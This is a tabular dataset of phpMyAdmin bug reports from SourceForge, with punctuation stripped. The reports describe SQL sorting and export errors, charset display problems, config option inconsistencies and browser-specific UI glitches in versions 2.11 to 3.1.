Log [22 aug 2008 14 01 40] PHP Fatal error Class ArrayObject not found in ... ... ... ... ... phpmyadmin libraries List.class.php on line 14 My system Gentoo php version PHP 5.2.6RC4 pl0 gentoo cli) built Apr 26 2008 08 59 26) Copyright c) 1997 2008 The PHP Group Zend Engine v2.2.0, Copyright c) 1998 2008 Zend Technologies with eAccelerator v0.9.5.3, Copyright c) 2004 2006 eAccelerator, by eAccelerator Info http radioxone.hu bug .
php) Original URL https sourceforge.net p phpmyadmin bugs 2748 https sourceforge.net p phpmyadmin bugs 2748 Original author alephlg Found in version 3.0.0","bug"
"24444","9112","Direct browse link goes to structure.
The icon to the left of each table name in the left navigation pane now goes to the structure view, rather than directly to the browse view.
Original URL https sourceforge.net p phpmyadmin bugs 2749 https sourceforge.net p phpmyadmin bugs 2749 Original author adrianbj Found in version 3.0.0","bug"
"24444","9113","Incorrect SQL generated when sorting view.
PhyMyAdmin 2.11.8.1 Server version 5.0.27 MySQL client version 5.0.27 Mozilla Firefox 3.0.1 and IE 6 Created view with code create view pupil as select s.id,s.code,c.sid,cid,last,first,a.active,grp,seat, homeroom,gender,couns,phone,se, c.descr,c.academic,c.web,c.SKILL SID from student s, class asgn a, class c where s.id = a.id and a.sid = c.sid and c.academic = 1 order by last,first when view browsed in myphpadmin and sid column selected, the following sql is generated SELECT FROM `pupil` ORDER BY `c`.`sid` ASC LIMIT 0 , 30 The `c`.` causes error 1054 Unknown column c.sid in order clause Original URL https sourceforge.net p phpmyadmin bugs 2750 https sourceforge.net p phpmyadmin bugs 2750 Original author gerardw Found in version 3.1.0","bug"
"24444","9114","Undefined variable seen from.
Notice Undefined variable seen from in [...] phpMyAdmin libraries sqlparser.lib.php on line 1148 Notice Undefined variable seen from in [...] phpMyAdmin libraries sqlparser.lib.php on line 1264 These errors seem to occur and they are repeated over and over) when there is a SELECT query, but it is preceded by an open parenthesis.
I m getting these in 2.11.3, but it doesn t seem like it has been fixed trunk yet.
For example, this anonymized) query causes the errors SELECT a. , b.
FROM table1 a LEFT OUTER JOIN table2 b ON a.id = b.id ) WHERE a.other id = text AND b.id IS NULL OR a.id IS NULL ) ) UNION ALL SELECT a. , b.
FROM table1 a RIGHT JOIN table2 b ON a.id = b.id ) WHERE a.other id = text AND b.id IS NULL OR a.id IS NULL ) ) WHERE a.other id = text AND b.id IS NULL OR a.id IS NULL ) Original URL https sourceforge.net p phpmyadmin bugs 2751 https sourceforge.net p phpmyadmin bugs 2751 Original author gphemsley Found in version 2.11.8","bug"
"24444","9115","Not usable config var DefaultCharset.
In documentation we have this description cfg[ DefaultCharset ] string Default character set to use for recoding of MySQL queries.
This must be enabled and it s described by cfg[ AllowAnywhereRecoding ] option.
You can give here any character set which is in cfg AvailableCharsets ] array and this is just default choice, user can select any of them.
As I unerstood, this directive is used on both pages Import and Export, to highlight default encoding charset option.
But it s not using at all.
On Export page we have another directive that makes exactly the same cfg[ Export ][ charset ].
Strange logic, think it should be clear up.
If we use cfg[ Export ][ charset ] let s make cfg[ Import ][ charset ] that will take place on Import page.
Or we have to use cfg[ DefaultCharset ] on Import and Export pages?
May be this directives is useless and it would be better to delete them at all?
There is a little mess in code that combine options from array.
Below is my suggestions for this part of code.
libraries display export.lib.php, line 206. if cfg[ AllowAnywhereRecoding ] allow recoding) \{ echo lt;label for= select charset of file gt; .
strCharsetOfFile .
lt; label gt; .
\n ; echo lt;select id= select charset of file name= charset of file size= 1 gt; .
\n ; foreach cfg[ AvailableCharsets ] as temp charset) \{ echo lt;option value= .
temp charset .
; if empty cfg[ Export ][ charset ]) temp charset == charset) || temp charset == cfg[ Export ][ charset ]) \{ echo selected= selected ; \} echo gt; .
temp charset .
lt; option gt; .
\n ; \} end foreach echo lt; select gt; ; \} end if libraries display import.lib.php, line 85. if cfg[ AllowAnywhereRecoding ] allow recoding) \{ echo lt;label for= charset of file gt; .
strCharsetOfFile .
lt; label gt; .
\n ; echo lt;select id= charset of file name= charset of file size= 1 gt; .
\n ; foreach cfg[ AvailableCharsets ] as temp charset) \{ echo lt;option value= .
htmlentities temp charset) .
; As possible variant.
if empty cfg[ Import ][ charset ]) temp charset == charset) || temp charset == cfg[ Import ][ charset ]) \{ echo selected= selected ; \} if temp charset == charset) \{ echo selected= selected ; \} echo gt; .
htmlentities temp charset) .
lt; option gt; .
\n ; \} echo lt; select gt; lt;br gt; .
\n .
; \} else \{ echo lt;label for= charset of file gt; .
strCharsetOfFile .
lt; label gt; .
\n ; echo PMA generateCharsetDropdownBox PMA CSDROPDOWN CHARSET, charset of file , charset of file , utf8 , FALSE); \} end if recoding) Original URL https sourceforge.net p phpmyadmin bugs 2752 https sourceforge.net p phpmyadmin bugs 2752 Original author hanut Found in version 3.0.0","bug"
"24444","9116","Subselect breaks pagination.
This may be the statement Select Select c.a double from my inner as c limit 1) from my outer It should give me the first 30 results by default but it doesn t. It tries to retrieve all.
The best part is It works with 2.11.0 beta1.
Just to be shure I got me Revision 10532 from https phpmyadmin.svn.sourceforge.net svnroot phpmyadmin tags RELEASE 2 11 0BETA1 phpMyAdmin.
Both trunk and beta1 are using the same config.inc.php.
Versions php v PHP 5.2.6 with Suhosin Patch 0.9.6.2 cli) built Jun 25 2008 09 50 01) Copyright c) 1997 2008 The PHP Group Zend Engine v2.2.0, Copyright c) 1998 2008 Zend Technologies mysql e show variables like version \G Variable name version Value 5.0.26 log apache2ctl v Server version Apache 2.2.3 Original URL https sourceforge.net p phpmyadmin bugs 2753 https sourceforge.net p phpmyadmin bugs 2753 Original author pertel Found in version Latest Git","bug"
"24444","9117","Can t edit row in VIEW.
A simple VIEW that JOINs two tables can be viewed but not edited.
An edit icon is present, but upon clicking edit, the error message is as follows Unknown column domain.id in where clause Indeed, there is no such column domain.id in the VIEW, though this column is present in one of the underlying tables.
It appears PMA is referring to columns in the underlying tables instead of columns in the VIEW.
Original URL https sourceforge.net p phpmyadmin bugs 2754 https sourceforge.net p phpmyadmin bugs 2754 Original author richardkmiller Found in version 2.11.9","bug"
"24444","9118","allowemptyroot implemented as allownopasswordroot.
updated to latest subversion could not login to existing mysql installation with no root password machine is for development no lectures ) found comment in changelog \ [auth] do not allow root user without password unless explicitly enabled by AllowEmptyRoot tried that in config.inc.php to no avail.
looked at other commits in setup lib forms.inc.php it is implemented as AllowNoPasswordRoot.
no preference on either just consistency.
Original URL https sourceforge.net p phpmyadmin bugs 2755 https sourceforge.net p phpmyadmin bugs 2755 Original author garthgillespie Found in version Latest Git","bug"
"24444","9119","Header Already Sent Error when output buffer is off.
phpMyAdmin 2.11.3 Login page will display Header Already Sent Error when output buffer is off.
I deliberately turned off my output buffer in order to write a better code logic since I am new in PHP programming.
I may not realize that same script is already called nor included.
Or Header is already sent because I may type utf8 notes into the file.
It will cause BOM problem since utf8 file will have a BOM and php will regard this as header sent like spaces, line and so on.
The error is only appeared in Login page so far.
And the phpMyAdmin is still functional inside.
Original URL https sourceforge.net p phpmyadmin bugs 2756 https sourceforge.net p phpmyadmin bugs 2756 Original author simongcc Found in version 2.11.3","bug"
"24444","9120","Wrong reference to strViewMaxExactCount.
When browsing a view.
Original URL https sourceforge.net p phpmyadmin bugs 2757 https sourceforge.net p phpmyadmin bugs 2757 Original author lem9","bug"
"24444","9121","2.11.9 Compatible export of sel.
datasets contains CONVERT.
Select datasets in a table output where a table uses a VARCHAR field as primary key, click the selected Export icon, select compatibility mode MYSQL40 and export type UPDATE The generated UPDATE SQL query still contains WHERE CONVERT `table`.`id field` USING utf8) = id const , although MySQL 4.0.x does not support CONVERT character table functions.
Original URL https sourceforge.net p phpmyadmin bugs 2758 https sourceforge.net p phpmyadmin bugs 2758 Original author ligh1l","bug"
"24444","9122","Leading newline truncated.
When I try do edit a row with a varchar wiht spaces or CL CLRF before text, phpmyadmin trunk this.
Example ================= OK ================= Phpmyadmin will convert to =================== OK =================== The php version is 5.2.6 3.
MySQL version is 5.0.56sp1 enterprise gpl lo Original URL https sourceforge.net p phpmyadmin bugs 2759 https sourceforge.net p phpmyadmin bugs 2759 Original author achapela Found in version 2.11.9","bug"
"24444","9123","Warn about incomplete exports.
From the forum i recently exported a database from phpmyadmin as a backup of my data.
i then deleted the original database from the server, safe in the knowledge that i had a backup or so i thought).
however, i later noticed the following line at the end of the file lt;b gt;Fatal error lt; b gt; Maximum execution time of 300 seconds exceeded in lt;b gt; usr local cpanel base 3rdparty phpMyAdmin libraries export sql.php lt; b gt; on line lt;b gt;904 lt; b gt; lt;br gt; it was then that i realised phpmyadmin had not fully exported the file.
even worse it had not warned me that the export was not complete!
i have therefore completely lost some very precious data.
this is a major problem!!!
for god s sake, please add a warning message to this software to let people know when an export has not completed.
it can t be rocket science and it s an extremely serious problem.
aside from that, phpmyadmin is a great piece of software.
but please, sort this out!
Original URL https sourceforge.net p phpmyadmin bugs 2760 https sourceforge.net p phpmyadmin bugs 2760 Original author lem9 Found in version 4.1.1","bug"
"24444","9124","UTF 8 entries in mysql dont get displayed correctly.
Server version 5.0.51a Protocol version 10 Server localhost via TCP IP phpMyAdmin 2.11.4 MySQL client version 5.0.51a Windows xampplite installation The problem and a temp solution is also reported in blog.mikezhang.com 2007 03 30 phpmyadmin display utf8 UTF 8 entries in mysql dont get displayed correctly when the MySQL charsets map is CORRECTLY set to xe2x80x98utf 8xe2x80xb2 = gt; xe2x80x98utf8xe2x80xb2.
When this value is INCORRECTLY set to xe2x80x98utf 8xe2x80xb2 = gt; xe2x80x98latin1xe2x80xb2, results DO get displayed CORRECTLY!!
The only thing that changes of course is the MySQL charset Collation, table encodings, php.ini and even the web page encodings are all set correctly to utf 8.
Original URL https sourceforge.net p phpmyadmin bugs 2761 https sourceforge.net p phpmyadmin bugs 2761 Original author angeloio","bug"
"24444","9125","Page number after database switching.
Hi I ve a LAMP environment based on Centos 5.2 with Apache MySQL Php updated to the last version.
I upgraded phpMyAdmin, so now I use this release 2.11.9.1 I ve dozen databases, one of it has more than 800 tables, when I click on it, it show the tables list on the left column, with a page selector.
Now, if I select the second or the next pages and then I change Database, phpMyAdmin maintain that page on the new view on other databases, so other databases show the message No tables found in database.
, because it is showing the ipotetical next 250 tables...
I think that this page selection variable, is better if will be re setted , when a user change database.
Best regards and good work!
Fabio and sorry... ..for my poor english ...and in the case that the question has been already reported!
Original URL https sourceforge.net p phpmyadmin bugs 2762 https sourceforge.net p phpmyadmin bugs 2762 Original author infinytech Found in version 2.11.9.1","bug"
"24444","9126","Propose Table Structure Unreadable.
The propose table structure feature gives unreadable results in the form of [BINARY xB].
Attached screenshot shows it all.
Original URL https sourceforge.net p phpmyadmin bugs 2763 https sourceforge.net p phpmyadmin bugs 2763 Original author canadiancow Found in version 3.0.0","bug"
"24444","9127","Drop down menu blinking in FF.
At the bottom of the Structure tab, you can add fields to the table... 1) At the end of the table 2) At the beginning of the table 3) After a selected field If you try 3 in Firefox and attempt to use the drop down menu to select a field, the menu will blink and snap back to its default setting.
Works fine in IE7 though.
Thanks!
Original URL https sourceforge.net p phpmyadmin bugs 2764 https sourceforge.net p phpmyadmin bugs 2764 Original author mark pmw Found in version 3.0.0","bug"
"24444","9128","Export with concat in sql gives spurious error, fails.
Export does not work when concat function is in the sql.
Perform an ordinary SQL queries that includes the concat function.
In my example...
SELECT SupplierName, ERP1 ProductCode, ProductDescription, CartonPrice, concat update ICBASE set SellingPrice1 = , CartonPrice, , StandardCost = , CartonPrice, , AverageCost = , CartonPrice, , LatestCost = , CartonPrice, initial traversal ICBASE key name CodeKey from , ERP1 ProductCode, to , ERP1 ProductCode, ; ) AS UpdateStmt FROM `PriceSourceLine` WHERE Input Id =319 AND NOT ERP1 IsNew ORDER BY ERP1 ProductCode LIMIT 391 Click Export at the bottom of the page Select any format, always produces an HTML page to the export output file.
MySQL said 1305 FUNCTION DistributorSales.concat does not exist The function is not a stored procedure of the database, it is a built in function.
Somehow in running the export phpmyadmin has prefixed the function with the database name.
Ubuntu Hardy Heron 8.04 64bit Reproduceable always.
Original URL https sourceforge.net p phpmyadmin bugs 2765 https sourceforge.net p phpmyadmin bugs 2765 Original author davemc50 Found in version 2.11.3","bug"
"24444","9129","Misleading message after cancelling an action.
When selecting [No] button on the confirm page for dropping table s, the resulting display is misleading since no query should be executed when [No] is selected.
The output displayed is Your SQL query has been executed successfully Running phpMyAdmin 2.11.3deb1ubuntu1.1 on MySQL client version 5.0.51a on Kubuntu 8.04 Original URL https sourceforge.net p phpmyadmin bugs 2766 https sourceforge.net p phpmyadmin bugs 2766 Original author binarycleric Found in version 3.0.0","bug"
"24444","9130","SQL error after sorting a subset.
Hello starting with this simple table ...
CREATE TABLE `users` `name` varchar 16) collate latin1 german2 ci NOT NULL, `id for` int 11) NOT NULL, `id` int 10) unsigned NOT NULL auto increment, PRIMARY KEY `id`) ) ENGINE=MyISAM DEFAULT CHARSET=latin1 COLLATE=latin1 german2 ci; INSERT INTO `users` VALUES alpha , 17, 1); INSERT INTO `users` VALUES beta , 17, 2); INSERT INTO `users` VALUES gamma , 18, 3); INSERT INTO `users` VALUES delta , 19, 4); I dipslayed a subset by searching via Search button) for rows with `id for` = 17 SELECT FROM `users` WHERE `id for` =17 LIMIT 0 , 50 Now every attempt to sort resultant subset by clicking on column names throws a SQL error Error SQL query Documentation SELECT FROM `users` WHERE `id for` = 17ORDER BY `users`.`name` ASC LIMIT 0 , 50 MySQL said Documentation 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near BY `users`.`name` ASC LIMIT 0, 50 at line 1 Cheers, Peter Original URL https sourceforge.net p phpmyadmin bugs 2767 https sourceforge.net p phpmyadmin bugs 2767 Original author mandabaer Found in version 3.0.0","bug"
"24444","9131","Multi Record INSERT query produces cannot display the page .
Version Info MySQL 5.0.67 Apache HTTP Server 2.2.9 OpenSSL PHPMyAdmin 2.11.9 All Languages OS Windows Vista Home Premium Browser Internet Explorer 7.0.6001.18000 When I run a multi record INSERT query, Internet explorer returns a Internet Explorer cannot display the webpage message.
Here are the exact queries I ran to create everything CREATE DATABASE IF NOT EXISTS FFLFreeAgents CREATE TABLE IF NOT EXISTS NFLTeams team id int 2) unsigned NOT NULL auto increment, team city varchar 255) NOT NULL, team name varchar 255) NOT NULL, team short varchar 5) NOT NULL, PRIMARY KEY team id)) INSERT IGNORE INTO NFLTeams team city, team name, team short) VALUES Buffalo , Bills , BUF ), Miami , Dolphins , MIA ), New England , Patriots , NE ), New York , Jets , NYJ ), Baltimore , Ravens , BAL ), Cincinnati , Bengals , CIN ), Cleveland , Browns , CLE ), Pittsburgh , Steelers , PIT ), Houston , Texans , HOU ), Indianapolis , Colts , IND ), Jacksonville , Jaguars , JAC ), Tennessee , Titans , TEN ), Denver , Broncos , DEN ), Kansas City , Chiefs , KC ), Oakland , Raiders , OAK ), San Diego , Chargers , SD ), Dallas , Cowboys , DAL ), New York , Giants , NYG ), Philadelphia , Eagles , PHI ), Washington , Redskins , WAS ), Chicago , Bears , CHI ), Detroit , Lions , DET ), Green Bay , Packers , GB ), Minnesota , Vikings , MIN ), Atlanta , Falcons , ATL ), Carolina , Panthers , CAR ), New Orleans , Saints , NO ), Tampa Bay , Buccaneers , TB ), Arizona , Cardinals , ARI ), San Francisco , 49ers , SF ), Seattle , Seahawks , SEA ), St. Louis , Rams , STL ) There are other tables in the database, but these are the items involved in the error.
The last query provided actually produced the error.
The values do make it into the table, the browser just displays the Internet explorer cannot display the webpage error.
Original URL https sourceforge.net p phpmyadmin bugs 2768 https sourceforge.net p phpmyadmin bugs 2768 Original author rubbernilly Found in version 2.11.9","bug"
"24444","9132","Clicking on browse icon in left hand frame goes to structure.
Before 3.0 I used to be able to click on the table icon in the left hand frame, which would go straight to the browse option.
Now, when this is clicked it goes to the structure page, as if I had clicked the text.
I am using phpmyadmin 3.0.0 rc2, php 5.2.5, mysql version 5.0.51a log, protocol version 10.
The browser is Firefox 3.0.3, but I have noticed it also happens in IE 7 Thanks Original URL https sourceforge.net p phpmyadmin bugs 2769 https sourceforge.net p phpmyadmin bugs 2769 Original author plus media Found in version 3.0.0","bug"
"24444","9133","Class ArrayObject not found.
On installing and completing config for v3.0.0, PMA returns Fatal error Class ArrayObject not found in [...] libraries List.class.php on line 14 I have re downloaded and re installed several times, same result on each occassion.
Versions as follows PHP 5.2.6 MySQL 5.1.26 rc PMA phpMyAdmin 3.0.0 english.7z OS FreeBSD 7.0Release Original URL https sourceforge.net p phpmyadmin bugs 2770 https sourceforge.net p phpmyadmin bugs 2770 Original author tenfourzero Found in version 3.0.0","bug"
"24444","9134","utf8 bin treated as binary.
If I want case sensitive collation for a utf8 column the only option I have is to use utf8 bin all other utf8 are case insensitive), but then the column is treated as binary by phpMyAdmin and I have trouble seeing it.
How to repeat Open phpMyAdmin and add a utf8 column into a table.
Suggested fix Add case sensitive non binary collation for utf8.
Original URL https sourceforge.net p phpmyadmin bugs 2771 https sourceforge.net p phpmyadmin bugs 2771 Original author porton","bug"
"24444","9135","Cannot create database after session timeout.
If you have logged in with a user that donxc2xb4t have permission to create a database.
Wait 10 minutes and klick somewhere, you get the loginscreen with you session timed out blabla .
But if you login as root now.
You want be able to create a database.
The no permission X is displayed in the create new database Box.
You have to click Exit and relogin to regain the right to create a database..
Original URL https sourceforge.net p phpmyadmin bugs 2772 https sourceforge.net p phpmyadmin bugs 2772 Original author spacefish007 Found in version 3.0.0","bug"
"24444","9136","Sort Buttons don t work for large queries.
PMA Version 3.0.0 also tried 2.11.92 PHP Version 5.2.4 MySQL 5.1.28 Problem In the query box use a large query mine was greater than 1000 characters).
The links for sorting columns are now buttons.
When you click these buttons they do nothing.
Why it happens There s no form around the buttons.
My Solution In display.tbl.lib.php line 823 I changed a false parameter to true order link = PMA linkOrButton order url, order link content .
order img, order link params, false, true); to order link = PMA linkOrButton order url, order link content .
order img, order link params, true, true); This causes the PMA linkOrButton to generate a new form around the button.
Original URL https sourceforge.net p phpmyadmin bugs 2773 https sourceforge.net p phpmyadmin bugs 2773 Original author xyrka Found in version 3.0.0","bug"
"24444","9137","Status Open Tables doesn t work.
The Open Tables link on the Status page returns to the index...
Original URL https sourceforge.net p phpmyadmin bugs 2774 https sourceforge.net p phpmyadmin bugs 2774 Original author olafvdspek Found in version 3.0.0","bug"
"24444","9138","Page displayed wrongly with long SQL query.
This happens when I use Internet Explorer 7, but not with Fire Fox 3.
After doing an import, only the text shown below is visible below the row of tabs.
To view the rest of the page the file to import section, etc) you have to use the scroll bars which appear to the right of the import results.
Clicking on the import tab redisplays the page correctly without the import results at the top and without scrollbars).
Import has been successfully finished, 7 queries executed.
phpMyAdmin SQL Dump version 3.0.0 http www.phpmyadmin.net Host localhost Generation Time Oct 08, 2008 at 04 16 PM Server version 5.0.67 PHP Version 5.2.6 Original URL https sourceforge.net p phpmyadmin bugs 2775 https sourceforge.net p phpmyadmin bugs 2775 Original author dmisc Found in version 3.0.0","bug"
"24444","9139","Missing Relation View link in Firefox.
When clicking on the structure link for a table there is no Relation View link when I use Firefox v3.0.3).
The link is present when I go to the same page using IE 7 or Google Chrome.
The fact the links shows up in one browser, but not another, leads me to believe it s not a config problem.
So I m submitting this bug report.
However, I tried setting the controluser pass to the mysql root login.
It didn t help.
When I copy the Relation View link from IE Chrome into firefox, the page does not display properly.
See attachment.
Using the copied link works properly when copying from IE to Chrome or vica versa.
Original URL https sourceforge.net p phpmyadmin bugs 2776 https sourceforge.net p phpmyadmin bugs 2776 Original author daekesh Found in version 3.0.0","bug"
"24444","9140","unneeded access on column info table with multiserver config.
If you have configured 2 server in config, server1 with pmadb and server2 without pmadb and you login to server 1 and then switch on the server dropdownlist to server2 and login then your get the following error 1142 SELECT command denied to user username for table pma column info phpmyadmin tries to get information on server2 from column info table but there is no config for server2 that say that phpmyadmin should do that.
This error ony appears if you use the server dropdown list to switch the server.
If you login to server1, then logout and then login to server2 there don t appears any error.
phpmyadmin 3.0.0 php PHP Version 5.2.0 8 etch11 Server Version 5.0.32 Debian 7etch6 log MySQL Client Version 5.0.32 PHP extension mysqli Original URL https sourceforge.net p phpmyadmin bugs 2777 https sourceforge.net p phpmyadmin bugs 2777 Original author c loos Found in version 3.0.0","bug"
"24444","9141","Index modification issue.
When modifying an index, the selector does not correspond to the current index type.
Original URL https sourceforge.net p phpmyadmin bugs 2778 https sourceforge.net p phpmyadmin bugs 2778 Original author lem9 Found in version 3.0.0","bug"
"24444","9142","Failing to show Database and table named count .
Using firefox 3.0.3 and tested under phpMyAdmin 3.0.0 and phpMyAdmin 2.11.7.
When clicking the database or table named count , the frame with table actions disappears or the links simply don t take you anywhere.
Original URL https sourceforge.net p phpmyadmin bugs 2779 https sourceforge.net p phpmyadmin bugs 2779 Original author beantrix","bug"
"24444","9143","Cannot disable PMA tables.
I have a database server on my local machine which is working fine, however when I try to connect to another server which I do not want to change the tables on I get the following error.
Table phpmyadmin.pma column info doesn t exist This is happening even though I have set cfg[ Servers ][ i][ pmadb ] = ; in my confir.inc.php file and have not set any of the other PMA options controluser, controlpass, bookmarktable, etc.
are all blank).
This is only happening since I upgraded to version 3 of phpMyAdmin.
I m using Apache 2.2 on windows XP with mysql versions 3 5 on both windows and linux machines.
Original URL https sourceforge.net p phpmyadmin bugs 2780 https sourceforge.net p phpmyadmin bugs 2780 Original author m jaggard Found in version 3.0.0","bug"
"24444","9144","Fatal error Cannot redeclare pma exportcomment ).
OS CentOS 5 Apache Version 2.2.9 PHP Version 5.2.6 PHP db ext mysqli MySQL Version 5.1.28 rc log MySQL charset UTF 8 Unicode utf8) When trying to export data in normal sql format I get this error Fatal error Cannot redeclare pma exportcomment ) previously declared in [portion of path removed for obscurity]phpmyadmin libraries export sql.php 8) in [portion of path removed for obscurity]phpmyadmin libraries export sql.php on line lt;i gt;138 lt; i gt; This is somewhat intermittent but seems to happen most when trying to export actual rows of data, instead of just schema structure.
Original URL https sourceforge.net p phpmyadmin bugs 2781 https sourceforge.net p phpmyadmin bugs 2781 Original author tony4d Found in version 3.0.0","bug"
"24444","9145","Non paginated database shows no table after paginating.
First access a database with more than 250 tables where the table list at the left gets paginated) and paginate to the second page of the list of tables of this database this is the huge database).
Then change to a database with less than 250 tables this is the small database).
You will see no tables at all.
This is the problem.
There is a trick to see the tables of the small database again go back to the huge database and paginate back to page one.
At this point you can go to the small database and you will see the tables in it.
Original URL https sourceforge.net p phpmyadmin bugs 2782 https sourceforge.net p phpmyadmin bugs 2782 Original author rsevero Found in version 2.11.9.x","bug"
"24444","9146","Italian language file causes major bugs.
Version affected 3.0.0 3.1 trunk Bug confirmed on phpMyAdmin by herc 21 10 08 The use of html entities in place of accented characters in the italian UTF 8 translation lead to this and possibly many others) issues DETAILS When requesting an action from the drop down box, having selected one or more tables, no action delete table, empty table) is done.
Since no sql code is executed and no error is encountered, the green tick appears stating that the query has been executed, but the sql code isn t reported.
FIX I have fixed this issue with my italian language file simply substituting all the html entities for accented characters such as amp;egrave;) with the respective UTF 8 characters.
Original URL https sourceforge.net p phpmyadmin bugs 2783 https sourceforge.net p phpmyadmin bugs 2783 Original author tuxolo Found in version 3.0.0","bug"
"24444","9147","bad session.save path not detected.
in pma 2.11 a bad configured session.save path triggers an error page Cannot start session without errors, please check errors given in your PHP and or webserver log file and configure your PHP installation properly.
No such hint in pma 3.x any more, the login just reloads.
simple test for .htaccess) php value session.save path thisDoesntExist Original URL https sourceforge.net p phpmyadmin bugs 2784 https sourceforge.net p phpmyadmin bugs 2784 Original author windkiel Found in version 3.0.0","bug"
"24444","9148","ShowChgPassword not respected.
The Change password link should not be displayed if cfg[ ShowChgPassword ] is false.
However this setting should probably be set to true by default.
Original URL https sourceforge.net p phpmyadmin bugs 2785 https sourceforge.net p phpmyadmin bugs 2785 Original author lem9 Found in version 3.0.0","bug"
"24444","9149","Bug show query do in 3.0.1.
When i do some query in SQL in db option after structure of db), also if i select the show alredy the query after not do it, in 2.11.9.2 work, in 3.0.0 and 3.0.1 not Original URL https sourceforge.net p phpmyadmin bugs 2786 https sourceforge.net p phpmyadmin bugs 2786 Original author fantu Found in version 3.0.1","bug"
"24444","9150","Results of OPTIMIZE TABLE displayed as BINARY.
After execution of optimize table in the view of result some string not show correct, i have upload screenshot of that Original URL https sourceforge.net p phpmyadmin bugs 2787 https sourceforge.net p phpmyadmin bugs 2787 Original author fantu Found in version 3.0.1","bug"
"24444","9151","Insert more than 9 rows.
When trying to insert more than 9 rows using the insert form the sql INSERT query gets truncated and due to that the following error appears 1136 Column count doesn t match value count at row 10 It always truncates after the second column entry of the 10th dataset.
My Setup is phpMyAdmin 3.0.1 3.0.0) MySQL 5.0.45 Apache 2.2.4 Linux SUSE) PHP Version 5.2.6 Original URL https sourceforge.net p phpmyadmin bugs 2788 https sourceforge.net p phpmyadmin bugs 2788 Original author oduke Found in version 3.0.1","bug"
"24444","9152","Problem with queries using CONCAT.
Example Table test id INT 10) Unsigned AI Primary Key name VARCHAR 32) SELECT CONCAT `name`, , `id`) FROM `test` Produces CONCAT name, , id) [BINARY 9B] [BINARY 8B] [BINARY 11B] [BINARY 9B] Original URL https sourceforge.net p phpmyadmin bugs 2789 https sourceforge.net p phpmyadmin bugs 2789 Original author philio27 Found in version 3.0.1","bug"
"24444","9153","Re login causes PMA to forget its current table.
1\.
Use cookie authentication 2\.
Log in, browse to a table, wait for session to expire.
3\.
Click on insert tab, re login 4\.
enter data to be inserted, and submit 5\.
PMA forgets which table its working with, resulting in queries like INSERT INTO `dbname`.`` ....
Using Firefox 3.0 Apache 2.2.8 Win32) MySQL 5.0.51a Original URL https sourceforge.net p phpmyadmin bugs 2790 https sourceforge.net p phpmyadmin bugs 2790 Original author satkins01 Found in version Latest Git","bug"
"24444","9154","NTLM Authentication causes logins to fail.
Took a while but I noted one site on the same server requested NTLM Authentication.
This seemes to hang around for any later requests to the same server in the same session.
When this occurs The login page will accept user password but the POST to the server contains the NTLM Authentication in the header and the page simply acts like the password was incorrect.
Opening a fresh browser and going directly to the myphpadmin works just fine.
Problem here was the site using NTLM had links to myphpadmin whcih would always fail) To reproduce try the following code from my server using Ubuntu Apache PHP5 lt;?php?
gt; lt;?
headers = apache request headers ); if !isset headers[ Authorization ]))\{ force an NTLM Authentication request header HTTP 1.1 401 Unauthorized ); header WWW Authenticate NTLM ); exit; \} ?
gt; lt;A HREF= phpmyadmin gt;Go to phpmyadmin lt; A gt; Original URL https sourceforge.net p phpmyadmin bugs 2791 https sourceforge.net p phpmyadmin bugs 2791 Original author paul denize Found in version 2.9.1.1","bug"
"24444","9155","Assigning a value in import.php?.
Hi File import.php This simply doesn t make any sense to me.
202 In case no memory limit we work on 10MB chunks 203 if memory limit = 1) \{ 204 memory limit = 10 1024 1024; 205 \} Shouldn t line 203 be if memory limit == 1) There is no reason that I can see why one couldn t assign 1 to the variable.
I have to assume this is supposed to be ==.
Glen Original URL https sourceforge.net p phpmyadmin bugs 2792 https sourceforge.net p phpmyadmin bugs 2792 Original author glenara Found in version 3.0.0","bug"
"24444","9156","Query involving a function shown as binary.
If you do a query with the MONTHNAME function, the result shows as an 8 bit binary column in phpMyAdmin.
SELECT MONTHNAME NOW ) ) AS month name [ phpMyAdmin result ] month name [BINARY 8B] However the mysql command line interface shows the name as expected mysql gt; SELECT MONTHNAME NOW ) ) AS month name ; | month name | | November | 1 row in set 0.00 sec) Original URL https sourceforge.net p phpmyadmin bugs 2793 https sourceforge.net p phpmyadmin bugs 2793 Original author lefevre10 Found in version 3.0.1","bug"
"24444","9157","Importing a view in a different database.
If you create a view in phpmyadmin 3.0.1.1 eg create view test view select from some table; then the database can be backed up with export but the exported file will break when it is imported back into an empty database with an SQL syntax error claiming that the table sic) with the view name already exists.
The view will be incorrectly left in the partially restored database as a table and all remaining statements in the script will be ignored.
views are a highly desirable element of mysql so I see this as a major issue with phpmyadmin.
The attached file is an example of a full backup export) of a simple database that cannot be imported again because of this problem.
Original URL https sourceforge.net p phpmyadmin bugs 2794 https sourceforge.net p phpmyadmin bugs 2794 Original author pwhipp","bug"
"24444","9158","Editing a row with big BLOB EXTREMELY slow.
I have bug tracking database and this database has a table contains a table that has a BLOB field.
When editing a row that has 2.7m blob data, this page is extremely slow.
When the pages finishes loading, the styles are gone.
And after this, all other pages are not functional only displays empty content.
I have to restart a session.
My guess is that though this page does NOT DISPLAY the blob data, but it actually READS the blob data; and since the data is big, it destroys something in session.
Original URL https sourceforge.net p phpmyadmin bugs 2795 https sourceforge.net p phpmyadmin bugs 2795 Original author neo in matrix Found in version 3.1.0","bug"
"24444","9159","Link to data wrong destination.
The image link that should point to the datas of a table, redirect here to its structure.
This is a new problem for this version...
Original URL https sourceforge.net p phpmyadmin bugs 2796 https sourceforge.net p phpmyadmin bugs 2796 Original author toumimi Found in version 3.1.0","bug"
"24444","9160","fclose ) error with Create PHP code.
Warning in .
import.php 354 fclose ) supplied argument is not a valid stream resource Backtrace .
import.php 354 fclose NULL) howto reproduce on the Demo server Browse any table, click on [ Create PHP Code ] that code only tests on FALSE, not NULL) Original URL https sourceforge.net p phpmyadmin bugs 2797 https sourceforge.net p phpmyadmin bugs 2797 Original author windkiel Found in version Latest Git","bug"
"24444","9161","Bookmarking not displayed in Safari.
I am using phpmyadmin 3.0.1.1 on Mac.
I enabled the pma user and am attempting to create a bookmark while using Safari browser latest 3.2.1) and the bookmark area is simply not shown.
I know it is configured properly as I can see the bookmark section in firefox on the same machine, using the same url, etc.
I tried to set the theme to default and it did not solve the problem.
Thanks!
I will attach a screenshot.
Original URL https sourceforge.net p phpmyadmin bugs 2798 https sourceforge.net p phpmyadmin bugs 2798 Original author jeffwhansen Found in version 3.0.1","bug"
"24444","9162","Incorrectly reported session error.
phpMyAdmin reports session error even in case that only problem with php configuration is not set timezone, what issues a warning.
Server log does not contain any error in this case.
